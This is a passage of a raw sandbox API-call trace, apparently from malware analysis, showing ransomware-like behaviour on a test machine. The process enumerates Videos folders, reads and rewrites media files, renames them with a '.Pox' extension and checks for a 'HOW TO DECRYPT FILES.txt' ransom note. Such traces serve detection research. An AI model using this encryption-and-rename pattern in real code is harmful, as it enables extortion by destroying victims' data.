lpOldMode=0x3ae45c) returned 1 [0041.956] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\dxkzzejfy-bja\\915yannklksuh.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\915YANnKlksuH.avi.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\dxkzzejfy-bja\\915yannklksuh.avi.pox")) returned 1 [0041.957] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4", lpFilePart=0x0) returned 0x4b [0041.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0041.957] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\dxkzzejfy-bja\\wgjbcfyacwe2k.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.957] GetFileType (hFile=0x26c) returned 0x1 [0041.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0041.957] GetFileType (hFile=0x26c) returned 0x1 [0041.957] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x4c31 [0041.957] ReadFile (in: hFile=0x26c, lpBuffer=0x23f85b4, nNumberOfBytesToRead=0x4c31, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x23f85b4*, lpNumberOfBytesRead=0x3ae488*=0x4c31, lpOverlapped=0x0) returned 1 [0041.958] CloseHandle (hObject=0x26c) returned 1 [0041.973] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0041.973] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0041.973] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4", lpFilePart=0x0) returned 0x4b [0041.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0041.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\dxkzzejfy-bja\\wgjbcfyacwe2k.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.974] GetFileType (hFile=0x26c) returned 0x1 [0041.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0041.974] GetFileType (hFile=0x26c) returned 0x1 [0041.974] WriteFile (in: hFile=0x26c, lpBuffer=0x245d23c*, nNumberOfBytesToWrite=0x4c40, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x245d23c*, lpNumberOfBytesWritten=0x3ae47c*=0x4c40, lpOverlapped=0x0) returned 1 [0041.975] CloseHandle (hObject=0x26c) returned 1 [0041.976] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4", lpFilePart=0x0) returned 0x4b [0041.976] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4.Pox", lpFilePart=0x0) returned 0x4f [0041.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0041.976] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\dxkzzejfy-bja\\wgjbcfyacwe2k.mp4"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb26a6ac0, ftCreationTime.dwHighDateTime=0x1d4cb39, ftLastAccessTime.dwLowDateTime=0x5aa505a0, ftLastAccessTime.dwHighDateTime=0x1d4c820, ftLastWriteTime.dwLowDateTime=0x2b33e400, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x4c40)) returned 1 [0041.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0041.976] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\dxkzzejfy-bja\\wgjbcfyacwe2k.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\dXKzZEjFy-BjA\\wGjbcfyAcwE2k.mp4.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\dxkzzejfy-bja\\wgjbcfyacwe2k.mp4.pox")) returned 1 [0041.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0041.977] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q", lpFilePart=0x0) returned 0x3a [0041.977] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\", lpFilePart=0x0) returned 0x3b [0041.977] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bbc34a0, ftCreationTime.dwHighDateTime=0x1d4cb24, ftLastAccessTime.dwLowDateTime=0xb4136950, ftLastAccessTime.dwHighDateTime=0x1d4c998, ftLastWriteTime.dwLowDateTime=0xb4136950, ftLastWriteTime.dwHighDateTime=0x1d4c998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0041.977] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bbc34a0, ftCreationTime.dwHighDateTime=0x1d4cb24, ftLastAccessTime.dwLowDateTime=0xb4136950, ftLastAccessTime.dwHighDateTime=0x1d4c998, ftLastWriteTime.dwLowDateTime=0xb4136950, ftLastWriteTime.dwHighDateTime=0x1d4c998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.977] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb100810, ftCreationTime.dwHighDateTime=0x1d4caad, ftLastAccessTime.dwLowDateTime=0xc35a5ac0, ftLastAccessTime.dwHighDateTime=0x1d4c657, ftLastWriteTime.dwLowDateTime=0xc35a5ac0, ftLastWriteTime.dwHighDateTime=0x1d4c657, nFileSizeHigh=0x0, nFileSizeLow=0x641, dwReserved0=0x0, dwReserved1=0x0, cFileName="0GtWwakP5.flv", cAlternateFileName="0GTWWA~1.FLV")) returned 1 [0041.977] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925910, ftCreationTime.dwHighDateTime=0x1d4d46e, ftLastAccessTime.dwLowDateTime=0x8ae2c60, ftLastAccessTime.dwHighDateTime=0x1d4ce68, ftLastWriteTime.dwLowDateTime=0x8ae2c60, ftLastWriteTime.dwHighDateTime=0x1d4ce68, nFileSizeHigh=0x0, nFileSizeLow=0x1032d, dwReserved0=0x0, dwReserved1=0x0, cFileName="A 1oaM.swf", cAlternateFileName="A1OAM~1.SWF")) returned 1 [0041.977] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcd3dd30, ftCreationTime.dwHighDateTime=0x1d4cc23, ftLastAccessTime.dwLowDateTime=0x8a7047d0, ftLastAccessTime.dwHighDateTime=0x1d4c7d6, ftLastWriteTime.dwLowDateTime=0x8a7047d0, ftLastWriteTime.dwHighDateTime=0x1d4c7d6, nFileSizeHigh=0x0, nFileSizeLow=0x44b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cn0JejUhf5.flv", cAlternateFileName="CN0JEJ~1.FLV")) returned 1 [0041.978] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a87790, ftCreationTime.dwHighDateTime=0x1d4c675, ftLastAccessTime.dwLowDateTime=0xd2ef7780, ftLastAccessTime.dwHighDateTime=0x1d4cfe0, ftLastWriteTime.dwLowDateTime=0xd2ef7780, ftLastWriteTime.dwHighDateTime=0x1d4cfe0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pYlk-npuf-T0m8Oo", cAlternateFileName="PYLK-N~1")) returned 1 [0041.978] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x675e1ce0, ftCreationTime.dwHighDateTime=0x1d4c727, ftLastAccessTime.dwLowDateTime=0xc3a60f80, ftLastAccessTime.dwHighDateTime=0x1d4c925, ftLastWriteTime.dwLowDateTime=0xc3a60f80, ftLastWriteTime.dwHighDateTime=0x1d4c925, nFileSizeHigh=0x0, nFileSizeLow=0x3a77, dwReserved0=0x0, dwReserved1=0x0, cFileName="v974nqEZsT5FDFAdVdnN.mkv", cAlternateFileName="V974NQ~1.MKV")) returned 1 [0041.978] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.978] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0041.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0041.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0041.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0041.978] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q", lpFilePart=0x0) returned 0x3a [0041.978] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\", lpFilePart=0x0) returned 0x3b [0041.978] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bbc34a0, ftCreationTime.dwHighDateTime=0x1d4cb24, ftLastAccessTime.dwLowDateTime=0xb4136950, ftLastAccessTime.dwHighDateTime=0x1d4c998, ftLastWriteTime.dwLowDateTime=0xb4136950, ftLastWriteTime.dwHighDateTime=0x1d4c998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0041.979] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bbc34a0, ftCreationTime.dwHighDateTime=0x1d4cb24, ftLastAccessTime.dwLowDateTime=0xb4136950, ftLastAccessTime.dwHighDateTime=0x1d4c998, ftLastWriteTime.dwLowDateTime=0xb4136950, ftLastWriteTime.dwHighDateTime=0x1d4c998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.979] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb100810, ftCreationTime.dwHighDateTime=0x1d4caad, ftLastAccessTime.dwLowDateTime=0xc35a5ac0, ftLastAccessTime.dwHighDateTime=0x1d4c657, ftLastWriteTime.dwLowDateTime=0xc35a5ac0, ftLastWriteTime.dwHighDateTime=0x1d4c657, nFileSizeHigh=0x0, nFileSizeLow=0x641, dwReserved0=0x0, dwReserved1=0x0, cFileName="0GtWwakP5.flv", cAlternateFileName="0GTWWA~1.FLV")) returned 1 [0041.979] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925910, ftCreationTime.dwHighDateTime=0x1d4d46e, ftLastAccessTime.dwLowDateTime=0x8ae2c60, ftLastAccessTime.dwHighDateTime=0x1d4ce68, ftLastWriteTime.dwLowDateTime=0x8ae2c60, ftLastWriteTime.dwHighDateTime=0x1d4ce68, nFileSizeHigh=0x0, nFileSizeLow=0x1032d, dwReserved0=0x0, dwReserved1=0x0, cFileName="A 1oaM.swf", cAlternateFileName="A1OAM~1.SWF")) returned 1 [0041.979] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcd3dd30, ftCreationTime.dwHighDateTime=0x1d4cc23, ftLastAccessTime.dwLowDateTime=0x8a7047d0, ftLastAccessTime.dwHighDateTime=0x1d4c7d6, ftLastWriteTime.dwLowDateTime=0x8a7047d0, ftLastWriteTime.dwHighDateTime=0x1d4c7d6, nFileSizeHigh=0x0, nFileSizeLow=0x44b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cn0JejUhf5.flv", cAlternateFileName="CN0JEJ~1.FLV")) returned 1 [0041.979] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a87790, ftCreationTime.dwHighDateTime=0x1d4c675, ftLastAccessTime.dwLowDateTime=0xd2ef7780, ftLastAccessTime.dwHighDateTime=0x1d4cfe0, ftLastWriteTime.dwLowDateTime=0xd2ef7780, ftLastWriteTime.dwHighDateTime=0x1d4cfe0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pYlk-npuf-T0m8Oo", cAlternateFileName="PYLK-N~1")) returned 1 [0041.980] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x675e1ce0, ftCreationTime.dwHighDateTime=0x1d4c727, ftLastAccessTime.dwLowDateTime=0xc3a60f80, ftLastAccessTime.dwHighDateTime=0x1d4c925, ftLastWriteTime.dwLowDateTime=0xc3a60f80, ftLastWriteTime.dwHighDateTime=0x1d4c925, nFileSizeHigh=0x0, nFileSizeLow=0x3a77, dwReserved0=0x0, dwReserved1=0x0, cFileName="v974nqEZsT5FDFAdVdnN.mkv", cAlternateFileName="V974NQ~1.MKV")) returned 1 [0041.980] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x675e1ce0, ftCreationTime.dwHighDateTime=0x1d4c727, ftLastAccessTime.dwLowDateTime=0xc3a60f80, ftLastAccessTime.dwHighDateTime=0x1d4c925, ftLastWriteTime.dwLowDateTime=0xc3a60f80, ftLastWriteTime.dwHighDateTime=0x1d4c925, nFileSizeHigh=0x0, nFileSizeLow=0x3a77, dwReserved0=0x0, dwReserved1=0x0, cFileName="v974nqEZsT5FDFAdVdnN.mkv", cAlternateFileName="V974NQ~1.MKV")) returned 0 [0041.980] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0041.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0041.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0041.980] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv", lpFilePart=0x0) returned 0x53 [0041.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0041.980] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\ufdmikn7zct9-q\\v974nqezst5fdfadvdnn.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.980] GetFileType (hFile=0x26c) returned 0x1 [0041.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0041.980] GetFileType (hFile=0x26c) returned 0x1 [0041.980] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x3a77 [0041.981] ReadFile (in: hFile=0x26c, lpBuffer=0x2464b8c, nNumberOfBytesToRead=0x3a77, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x2464b8c*, lpNumberOfBytesRead=0x3ae488*=0x3a77, lpOverlapped=0x0) returned 1 [0041.981] CloseHandle (hObject=0x26c) returned 1 [0041.995] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0041.995] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0041.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv", lpFilePart=0x0) returned 0x53 [0041.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0041.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\ufdmikn7zct9-q\\v974nqezst5fdfadvdnn.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.996] GetFileType (hFile=0x26c) returned 0x1 [0041.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0041.997] GetFileType (hFile=0x26c) returned 0x1 [0041.997] WriteFile (in: hFile=0x26c, lpBuffer=0x24c3df8*, nNumberOfBytesToWrite=0x3a80, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x24c3df8*, lpNumberOfBytesWritten=0x3ae47c*=0x3a80, lpOverlapped=0x0) returned 1 [0041.998] CloseHandle (hObject=0x26c) returned 1 [0041.998] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv", lpFilePart=0x0) returned 0x53 [0041.998] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv.Pox", lpFilePart=0x0) returned 0x57 [0041.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0041.998] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\ufdmikn7zct9-q\\v974nqezst5fdfadvdnn.mkv"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x675e1ce0, ftCreationTime.dwHighDateTime=0x1d4c727, ftLastAccessTime.dwLowDateTime=0xc3a60f80, ftLastAccessTime.dwHighDateTime=0x1d4c925, ftLastWriteTime.dwLowDateTime=0x2b364560, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x3a80)) returned 1 [0041.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0041.999] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\ufdmikn7zct9-q\\v974nqezst5fdfadvdnn.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\v974nqEZsT5FDFAdVdnN.mkv.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\ufdmikn7zct9-q\\v974nqezst5fdfadvdnn.mkv.pox")) returned 1 [0042.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0042.000] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo", lpFilePart=0x0) returned 0x4b [0042.000] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\", lpFilePart=0x0) returned 0x4c [0042.000] FindFirstFileW (in: 